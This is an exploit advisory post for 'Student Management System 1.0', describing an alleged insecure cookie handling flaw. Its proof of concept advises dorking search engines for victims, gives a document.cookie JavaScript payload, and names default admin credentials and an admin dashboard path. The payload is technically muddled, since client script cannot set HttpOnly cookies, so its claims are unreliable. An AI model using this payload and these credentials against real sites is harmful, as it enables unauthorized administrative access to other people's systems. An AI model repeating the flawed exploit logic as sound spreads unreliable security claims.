Student Management System 1.0 Insecure Cookie Handling
Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.
Posted Sep 30, 2024
Authored by indoushka
tags | exploit, insecure cookie handling
SHA-256 | d658fbfc8c6a719141fdd1f2794283b78eab23b21c7970420e8965f026849eba
====================================================================================
| # Title     : Student Management System 1.0 Insecure Cookie Handling Vulnerability |
| # Author    : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/ |
====================================================================================

poc :

[+] Dorking In Google Or Other Search Engine.
[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";
[+] The default username is admin & The chosen password is user123
[+] http://127.0.0.1/studentms/admin/dashboard.php

Greetings to :
====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx) |
====================================================================================